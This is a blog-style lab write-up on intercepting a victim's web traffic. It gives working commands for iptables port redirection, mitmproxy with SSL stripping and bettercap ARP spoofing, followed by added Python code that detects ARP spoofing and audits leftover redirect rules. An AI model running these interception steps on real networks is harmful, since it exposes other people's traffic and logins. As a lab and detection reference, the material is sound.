|| Date: 19-01-06 ||
|| Tag: write-up ||

Remote Man-in-the-Middle with Bettercap and Mitmproxy

Remote MITM Setup

Basic Environment Setup

Hook the attack machine (which I’ll call BlackArch) and the victim machine (which I’ll call Alice) to the same network. I did this in testing by having both of them in a Bridged network configuration under my phone’s hotspot. Safe and Secure®.

We’ll need to set up IP forwarding and port redirection first.

Set Up IP Forwarding and Redirection

$ sysctl -w net.ipv4.ip_forward=1
$ sysctl -w net.ipv6.conf.all.forwarding=1
$ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
$ iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
$ ip6tables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
$ ip6tables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080

mitmproxy will take care of the rest.

Set Up the Proxy: MitmProxy

Link: https://mitmproxy.org/

$ mitmproxy --mode transparent --showhost -s sslstrip.py   # --showhost shows the real host in the URL display

Okay, we have IP forwarding set up. We’ve got redirection of ports 80 and 443 to port 8080 (the mitmproxy port). And we have a proxy set up to intercept anything going there (HTTP and HTTPS).

The sslstrip.py script is there to strip out HTTPS from links and redirects so the client keeps talking plain HTTP. It’s not ideal for navigating between pages, but an unsuspecting target will be vulnerable. Download it from here.

If you’re doing this locally (not against a remote target) for the purposes of dynamic analysis or whatever, don’t use sslstrip.py; instead, navigate to mitm.it AFTER the ARP spoofing step to install mitmproxy’s SSL certificates.

ARP Spoofing with Bettercap

Link: https://github.com/bettercap/bettercap

NOTE: you can actually set up a proxy with Bettercap’s http.proxy and https.proxy modules. I love it and it works like magic, but I’d rather have one tool do one thing. To be frank, I would even use Burp as the proxy instead, but I prefer mitmproxy since it’s CLI-based and works in a pinch.

Install and run Bettercap on BlackArch.

Conduct a small nmap scan to figure out what Alice’s IP is. Let’s say we found out it’s 10.10.10.4.

Conduct the ARP spoof:

$ sudo bettercap -iface enp0s3
>> net.recon off                                  # Disable net.recon modules
>> set arp.spoof.target 10.10.10.4; arp.spoof on;
>> set net.sniff.local true                       # ONLY IF DONE REMOTELY. Since the redirection occurs to my machine, packets are local
>> net.sniff on                                   # Sniff the network, just to know if things are working.
                                                  # I won't see any HTTP packets here since I didn't run the http.proxy module

If you’re in a local environment (not with a remote Alice), we can run arp -a on Alice now to see that the gateway’s IP entry now carries BlackArch’s MAC address, i.e. the same MAC shows up for both the gateway and BlackArch.
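The arp -a check above is also exactly what a defender looks for on a host or from a capture. The following Python checker is an added example, not part of the write-up or of either tool: it parses constructed arp -a output (the sample text, the addresses 10.10.10.1, 10.10.10.7, 10.10.10.9 and the MACs are all made up for this example), flags any MAC that answers for more than one IP, compares the gateway entry against a known-good MAC if you have one, and, in a second function, watches a stream of ARP replies for an IP whose MAC flips.

```python
import re
from collections import defaultdict

# Constructed sample of `arp -a` on the victim while the gateway (10.10.10.1)
# and another host (10.10.10.9) resolve to the same MAC. The <incomplete>
# entry is there to show a line the parser must skip. Not real capture data.
SAMPLE_ARP_A = """\
_gateway (10.10.10.1) at 08:00:27:aa:bb:cc [ether] on enp0s3
? (10.10.10.9) at 08:00:27:aa:bb:cc [ether] on enp0s3
? (10.10.10.7) at 52:54:00:12:34:56 [ether] on enp0s3
? (10.10.10.2) at <incomplete> on enp0s3
"""

# "(ip) at mac" as printed by BSD-style `arp -a` on Linux.
ARP_LINE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.I,
)


def parse_arp_table(text):
    """Extract (ip, mac) pairs from `arp -a` output; MACs are lowercased."""
    entries = []
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            entries.append((m.group("ip"), m.group("mac").lower()))
    return entries


def find_shared_macs(entries):
    """Return {mac: sorted ips} for every MAC that answers for more than one IP."""
    by_mac = defaultdict(set)
    for ip, mac in entries:
        by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def check_arp_table(text, gateway_ip, expected_gateway_mac=None):
    """Audit one snapshot of the ARP cache. Alerts on any MAC claiming several
    IPs (noting when one of them is the gateway) and, if the real gateway MAC
    is known, on the gateway resolving to anything else."""
    entries = parse_arp_table(text)
    alerts = []
    for mac, ips in find_shared_macs(entries).items():
        note = " (includes gateway)" if gateway_ip in ips else ""
        alerts.append(f"MAC {mac} claims {len(ips)} IPs: {', '.join(ips)}{note}")
    if expected_gateway_mac:
        current = dict(entries).get(gateway_ip)
        if current and current != expected_gateway_mac.lower():
            alerts.append(
                f"gateway {gateway_ip} resolves to {current}, "
                f"expected {expected_gateway_mac.lower()}"
            )
    return alerts


def watch_arp_replies(observations, gateway_ip):
    """Stateful check over (ip, mac) pairs taken from ARP replies in arrival
    order (e.g. fed from a packet capture): alert whenever an IP's MAC flips,
    which is what a spoofer racing the real host produces on the wire."""
    seen = {}
    alerts = []
    for ip, mac in observations:
        mac = mac.lower()
        prev = seen.get(ip)
        if prev is not None and prev != mac:
            tag = "GATEWAY " if ip == gateway_ip else ""
            alerts.append(f"{tag}{ip} changed {prev} -> {mac}")
        seen[ip] = mac
    return alerts


if __name__ == "__main__":
    # Known-good gateway MAC here is a made-up value for the demonstration.
    for a in check_arp_table(SAMPLE_ARP_A, "10.10.10.1", "08:00:27:11:22:33"):
        print("ALERT:", a)
```

On a real host, feed it the output of arp -a (or ip neigh, after adjusting the regex) and the gateway address from ip route; the known-good gateway MAC is something you record while the network is in a trusted state, since the snapshot alone cannot tell which of two hosts sharing a MAC is the impostor.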

We’re done. If you want to do any web page replacements, it’s best done as a Python script attached to mitmproxy with the -s parameter. mitmproxy’s GitHub repository has a lot of examples in the examples/ directory.

Appendix #1: Install Bettercap on Arch Linux

$ sudo pacman -S libnetfilter_queue libpcap mitmproxy
$ go get github.com/bettercap/bettercap

Appendix #2: Reset IP Forwarding and Redirection

$ sysctl -w net.ipv4.ip_forward=0
$ sysctl -w net.ipv6.conf.all.forwarding=0
$ iptables -t nat -D PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
$ iptables -t nat -D PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
$ ip6tables -t nat -D PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
$ ip6tables -t nat -D PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
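After running the reset it is worth confirming that nothing is left behind, because a machine that keeps forwarding and redirecting ports 80 and 443 to a now-absent proxy will silently break or expose traffic later. The script below is an added example, not from the write-up: it audits the two sysctl keys and the PREROUTING chains of the nat table for leftover REDIRECT rules. It assumes the rule listing format of iptables -t nat -S (which prints the option as --to-ports even when the rule was added with --to-port); the sample rule text is constructed for the demonstration, and audit_live runs the real commands on the host (iptables needs root).

```python
import re
import subprocess

# Constructed sample of `iptables -t nat -S PREROUTING` after the attack but
# before the reset. Not real output from any host.
SAMPLE_NAT_V4 = """\
-P PREROUTING ACCEPT
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8080
-A PREROUTING -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 8080
"""
SAMPLE_NAT_V6 = "-P PREROUTING ACCEPT\n"  # IPv6 chain already clean

FORWARDING_KEYS = ("net.ipv4.ip_forward", "net.ipv6.conf.all.forwarding")


def leftover_redirects(rules_text, proxy_port=8080):
    """Return the PREROUTING rules that still redirect traffic to proxy_port.
    Accepts both --to-port and --to-ports spellings."""
    pat = re.compile(rf"-j REDIRECT --to-ports? {proxy_port}\b")
    return [line.strip() for line in rules_text.splitlines() if pat.search(line)]


def audit_outputs(sysctl_values, nat_v4, nat_v6, proxy_port=8080):
    """Pure function over already-collected command output.
    sysctl_values maps key -> raw `sysctl -n` output; nat_v4/nat_v6 are the
    `-S PREROUTING` listings. Returns a list of findings (empty means clean)."""
    findings = []
    for key in FORWARDING_KEYS:
        if sysctl_values.get(key, "0").strip() != "0":
            findings.append(f"{key} is still enabled")
    for family, text in (("iptables", nat_v4), ("ip6tables", nat_v6)):
        for rule in leftover_redirects(text, proxy_port):
            findings.append(f"{family}: leftover rule: {rule}")
    return findings


def audit_live(proxy_port=8080):
    """Collect the real values from this host and audit them (run as root)."""
    def run(cmd):
        return subprocess.run(cmd, capture_output=True, text=True).stdout

    sysctls = {key: run(["sysctl", "-n", key]) for key in FORWARDING_KEYS}
    v4 = run(["iptables", "-t", "nat", "-S", "PREROUTING"])
    v6 = run(["ip6tables", "-t", "nat", "-S", "PREROUTING"])
    return audit_outputs(sysctls, v4, v6, proxy_port)


if __name__ == "__main__":
    # Demonstration on constructed data: IPv4 forwarding still on, v4 rules left.
    sample_sysctls = {"net.ipv4.ip_forward": "1\n", "net.ipv6.conf.all.forwarding": "0\n"}
    for finding in audit_outputs(sample_sysctls, SAMPLE_NAT_V4, SAMPLE_NAT_V6):
        print("FINDING:", finding)
```

Note that the reset commands in the appendix only delete one matching rule per -D call; if the setup was run twice, two copies exist and a single reset leaves one behind, which is exactly the case this audit catches.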